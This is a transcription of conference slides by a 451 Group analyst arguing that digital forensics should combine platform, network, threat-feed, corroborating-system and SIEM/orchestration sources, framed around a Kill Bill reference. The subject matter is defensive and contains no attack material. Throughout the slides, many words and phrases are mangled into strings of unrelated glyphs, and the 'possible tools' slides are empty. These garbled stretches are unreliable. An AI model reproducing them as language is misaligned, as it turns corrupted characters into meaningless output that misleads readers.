Five Point Palm Exploding Heart Technique for Forensics

Transcription

Five Point Palm Exploding Heart Technique for Forensics
The Five Point Palm Exploding Heart Technique for Forensics Andrew Hay
The 451 Group
The 451 Group 451 Research is focused on the business of enterprise IT innovation. dŚĞĐŽŵƉĂŶLJ͛ƐĂŶĂůLJƐƚƐƉƌŽǀŝĚĞĐƌŝƚŝĐĂůĂŶĚƚŝŵĞůLJŝŶƐŝŐŚƚinto the competitive dynamics of innovation in emerging technology segments. Tier1 Research is a single-­‐source research and advisory firm covering the multi-­‐tenant datacenter, hosting, IT and cloud-­‐computing sectors, blending the best of industry and financial research. The Uptime Institute ŝƐ͚dŚĞGlobal Data Center ƵƚŚŽƌŝƚLJ͛and a pioneer in the creation and facilitation of end-­‐user knowledge communities to improve reliability and uninterruptible availability in datacenter facilities. TheInfoPro is a leading IT advisory and research firm that provides real-­‐world perspectives on the customer and market dynamics of the enterprise information technology landscape, harnessing the collective knowledge and insight of leading IT organizations worldwide. ChangeWave Research is a research firm that identifies and quantifies ͚ĐŚĂŶŐĞ͛in consumer spending behavior, corporate purchasing, and industry, company and technology trends. Introductions ‡ Andrew Hay ‡ Senior Security Analyst, The 451 Group ‡ Author, Speaker and Blogger ‡ Coverage Areas: ‡ ESIM (SIEM & Log Management) ‡ IT-­‐GRC ‡ Forensics & Incident Response ‡ Intrusion Detection/Prevention ‡ Macro research areas: ‡ [Nation State] Cyber Security & Critical Infrastructure Protection What is this talk about? ‡
‡
Forensics has traditionally been viewed as very system-­‐specific Only recently, has external (off of the target machine) sources of ĐŽƌƌŽďŽƌĂƚŝŶŐĞǀŝĚĞŶĐĞďĞĞŶĐŽŶƐŝĚĞƌĞĚ͚ǀĂůƵĂďůĞ͛ďLJŝŶǀĞƐƚŝŐĂƚŽƌƐ Image Source: http://infosecnewbie.blogspot.com/2010/11/open-source-forensics-fundamental.html
ƐƐĞŶƚŝĂůůLJ͕ǁĞŶĞĞĚůĞƐƐŽĨƚŚŝƐ͙ Image Source: http://preview.tinyurl.com/3wtpgre
ŶĚŵŽƌĞŽĨƚŚŝƐ͙ Image Source: http://preview.tinyurl.com/3ux8bo6
/ĚĞĂĨŽƌƚŚŝƐƚĂůŬ͙ ‡
‡
‡
The idea for this talk came from dĂƌĂŶƚŝŶŽ͛ƐKill Bill two-­‐part epic revenge drama In it, martial arts master Pai Mei ƚĞĂĐŚĞƐ͚dŚĞƌŝĚĞ͛ĂƚĞĐŚŶŝƋƵĞ
wherein pressure points on the victim's chest are struck leaving them with a few footsteps before their death This technique is referred to as ƚŚĞ͚&ŝǀĞWŽŝŶƚWĂůŵdžƉůŽĚŝŶŐ
Heart dĞĐŚŶŝƋƵĞ͛ Image Source: http://inatitude.files.wordpress.com/2009/02/pai-mei.jpg
So what are the five points? Data Reduction Corroborators Orchestration Network Forensics Platform Forensics Point 1 ʹ Platform forensics ‡
‡
‡
‡
͚dƌĂĚŝƚŝŽŶĂůĨŽƌĞŶƐŝĐƐ͛ No one will argue that the artifacts residing on the suspect endpoint hold lots of information Volatile memory, application ĂƌƚŝĨĂĐƚƐĂŶĚŽƚŚĞƌ͚ĨŽŽƚƉƌŝŶƚƐ͛ One should be cognizant, however, of the other sources of information spread throughout an enterprise environment NOT residing on the target system Image Source: https://cagandoregra.wordpress.com/2010/08/03/the-36th-chamber-of-shaolin-a-camara-36-de-shaolin/
Point 1 ʹ Platform forensics: possible tools Platform Forensics Point 2 ʹ Network forensics ‡ If a host needs to talk to the world, it needs to leverage the network ‡ Likewise, if an attacker interacted with the machine remotely there may be a trail ‡ Deep packet inspection (DPI), network flow generation/collection/inspection, packet sniffers and flow analytics engines Image Source: http://www.imdb.com/media/rm2382076160/ch0001814
Point 2 ʹ Network forensics: possible tools Network Forensics Point 3 ʹ Data reduction ‡
‡
‡
‡
Feeds and sources of third party data that help analysts ĨŽĐƵƐŽŶƚŚĞ͚ďĂĚ͛ Why look at what we know ǁĞĚŽŶ͛ƚŶĞĞĚƚŽůŽŽŬĂƚ͍ ͚'ĞƚďLJ͛ǁŝƚŚĂůŝƚƚůĞŚĞůƉ
from your friends Application whitelisting, threat intelligence feeds, known compromised IP addresses/ranges, etc. Image Source: http://1morefilmblog.com/wordpress/dis-enchanted-female-power-and-authority-in-ella-enchanted-and-kill-billvolume-2/
Point 3 ʹ Data reduction: possible sources Data Reduction Point 4 ʹ Corroborators ‡ ͚,ĞůƉĞƌƐ͛ŽƌƐŽƵƌĐĞƐŽĨ
additional information ‡ Vulnerability & patch management ‡ Perimeter detection/protection ‡ Endpoint protection ‡ Change, configuration and policy management ‡ System management ‡ DLP, NAC, etc. Image Source: http://1morefilmblog.com/wordpress/dis-enchanted-female-power-and-authority-in-ella-enchanted-and-kill-billvolume-2/
Point 4 ʹ Corroborators: possible sources Corroborators Point 5 ʹ Orchestration ‡ Tools designed to correlate, normalize and alert on enterprise information (not just security information) ‡ Central repositories of ŝŶĨŽƌŵĂƚŝŽŶĂƌĞ͙ǁĞůů͙central repositories of information! ‡ SIEM, log management, IT GRC, compliance management, etc. Image Source: http://celluloidamazing.blogspot.com/2009/11/when-i-woke-up-i-went-on-what-movie.html
Point 5 ʹ Orchestration: possible tools Orchestration What will it look like? Data Reduction Corroborators Orchestration Network Forensics Platform Forensics The result? ‡ Many hands make light work ʹ this extremely true with regards to forensics ‡ Evidence on a system can almost always be enriched by external sources of corroborating evidence ‡ Hindsight is 20/20 ʹ deploy now to help later Image Source: http://totallyradicalsportz.wordpress.com/2010/10/11/smackfest/
The result? ‡ Vendors must strive to ͚ƉůĂLJ
ƚŽŐĞƚŚĞƌ͛ĨŽƌƚŚŝƐŝŶƚĞŐƌĂƚŝŽŶƚŽ
work ‡ Some vendors are starting down this path but primarily to enrich their own data ‡ WE need to teach non-­‐
forensics vendors the value of forensic data ‡ WE need to teach forensics vendors the value of integration Image Source: http://blog.lowpricelessons.com/wp-content/uploads/2011/01/kill-bill-uma-in-car.jpg
The result? Image Source: http://en.wikipedia.org/wiki/File:Clenched_human_fist.png
Thank zŽƵ͙ Questions? Questions? andrew.hay@the451group.com